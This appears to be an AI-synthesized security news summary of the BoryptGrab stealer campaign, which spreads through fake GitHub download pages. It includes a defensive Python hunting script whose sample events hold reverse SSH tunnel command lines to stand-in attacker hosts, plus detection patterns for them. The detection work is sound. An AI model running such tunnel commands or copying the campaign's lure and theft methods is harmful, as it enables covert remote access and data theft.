VYPR research
Published Mar 5, 2026 · Updated May 20, 2026 · 1 source

New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages

Trend Micro researchers detail the BoryptGrab stealer campaign, which uses SEO-poisoned GitHub repositories and fake download pages to deliver a data-stealing malware family with a reverse SSH backdoor to Windows users.

Trend Micro researchers have uncovered a new malware campaign dubbed BoryptGrab that targets Windows users through a sophisticated distribution chain leveraging SEO-optimized GitHub repositories and deceptive download pages. The campaign delivers a data-stealing malware family capable of harvesting browser data, cryptocurrency wallet information, system details, and more, along with a novel reverse SSH backdoor called TunnesshClient.

The infection chain begins when victims search for popular software tools—such as gaming cheats, video editors, or system utilities—and encounter malicious GitHub repositories that rank highly in search results due to embedded SEO keywords. These repositories, numbering over a hundred according to Trend Micro, host README files that appear legitimate but contain links to fake download pages hosted on GitHub Pages. The earliest ZIP file identified dates to late 2025, with the initial commit of the earliest repository made in April 2025.

Once a user downloads a ZIP file from a fake download page, the malware is executed. The BoryptGrab stealer then collects a wide range of sensitive data, including browser credentials, cryptocurrency wallet files, screenshots, Telegram and Discord tokens, and passwords. Some variants also download the TunnesshClient backdoor, a PyInstaller executable that establishes a reverse SSH tunnel to the attacker's server, enabling persistent remote access and acting as a SOCKS5 proxy for further malicious activity.
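The reverse SSH tunnel behaviour described above is something a defender can hunt for in endpoint telemetry without needing the campaign's own indicators. The following Python script is an added example written for this summary; it is not code from Trend Micro's report and contains no indicators from it. It scores process-creation events for the traits a backdoor of this kind tends to exhibit: an SSH client invoked with a remote port forward (`-R`), no remote command (`-N`), host-key checking disabled, and a process lineage that passes through a PyInstaller one-file extraction directory (`_MEI<digits>`) or another user-writable location. The event records, field names, thresholds and IP addresses are constructed for illustration.

```python
"""Heuristic hunt for reverse SSH tunnel activity in process-creation telemetry.

Added example (not from the Trend Micro report). The event field names,
sample records, scoring weights and threshold are assumptions for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# OpenSSH/plink remote port forward: "-R [bind:]port:host:hostport" or "-R port".
REVERSE_FORWARD_RE = re.compile(r"(?:^|\s)-R\s*\S+")
# "-N": open the connection without running a remote command (tunnel only).
NO_COMMAND_RE = re.compile(r"(?:^|\s)-N(?:\s|$)")
# PyInstaller one-file executables unpack into a temp directory named _MEI<digits>.
PYINSTALLER_TMP_RE = re.compile(r"[\\/]_MEI\d+[\\/]", re.IGNORECASE)
# Common user-writable drop locations on Windows.
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\(?:AppData\\Local\\Temp|Downloads)\\", re.IGNORECASE)
SSH_CLIENTS = {"ssh.exe", "plink.exe", "ssh"}

# Constructed sample events (Sysmon-style fields, simplified). IPs are documentation ranges.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent": r"C:\Users\alice\AppData\Local\Temp\_MEI48122\client.exe",
     "cmdline": r"ssh.exe -N -R 44321:127.0.0.1:22 -o StrictHostKeyChecking=no user@203.0.113.10"},
    {"pid": 5001, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"ssh.exe -L 8080:localhost:80 dev@10.0.0.5"},
    {"pid": 6002, "image": r"C:\Users\bob\Downloads\tool\updater.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"updater.exe --check"},
    {"pid": 7003, "image": r"C:\Users\bob\Downloads\plink.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"plink.exe -N -R 1080 attacker@198.51.100.7"},
]


@dataclass
class Finding:
    pid: int
    score: int = 0
    reasons: List[str] = field(default_factory=list)


def analyze_event(event: dict, threshold: int = 3) -> Optional[Finding]:
    """Return a Finding when an SSH client invocation looks like a reverse tunnel."""
    image = event["image"].replace("/", "\\")
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe not in SSH_CLIENTS:
        return None  # only SSH client processes are scored
    cmd = event["cmdline"]
    parent = event.get("parent", "")
    finding = Finding(pid=event["pid"])

    def add(weight: int, reason: str) -> None:
        finding.score += weight
        finding.reasons.append(reason)

    if REVERSE_FORWARD_RE.search(cmd):
        add(3, "remote port forward (-R) requested")
    if NO_COMMAND_RE.search(cmd):
        add(1, "no remote command (-N): connection used only for forwarding")
    if "stricthostkeychecking=no" in cmd.replace(" ", "").lower():
        add(1, "host-key verification disabled")
    if PYINSTALLER_TMP_RE.search(parent) or PYINSTALLER_TMP_RE.search(image):
        add(2, "PyInstaller one-file temp directory (_MEI) in process lineage")
    if USER_WRITABLE_RE.search(image) or USER_WRITABLE_RE.search(parent):
        add(1, "executable or parent runs from a user-writable location")

    return finding if finding.score >= threshold else None


def hunt(events: List[dict]) -> List[Finding]:
    """Score every event and keep only those over the threshold, in input order."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid={f.pid} score={f.score}")
        for reason in f.reasons:
            print(f"  - {reason}")
```

The weights make a remote port forward a precondition for any alert, so ordinary developer use of local forwarding (`-L`) scores zero, while the PyInstaller lineage and disabled host-key check raise confidence rather than being required. Combined flags such as `-NR` are not parsed by these patterns; a production rule would tokenise the command line properly.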

Analysis of the malware code reveals Russian-language comments and log messages throughout different stages of the attack chain, and IP addresses associated with the campaign are located in Russia, suggesting a possible Russian origin for the threat actor. Trend Micro also observed variants of the existing Vidar stealer with code obfuscation being delivered in the same campaign, indicating the attackers are evolving their toolkit.

The campaign demonstrates an evolving social engineering and supply-chain attack vector, exploiting trust in open-source platforms like GitHub to distribute malware. Trend Micro recommends that users verify the authenticity of software downloads, especially from third-party repositories, and employ security solutions that can detect such multi-stage attacks. The full technical analysis, including indicators of compromise, is available in Trend Micro's research report.

Synthesized by Vypr AI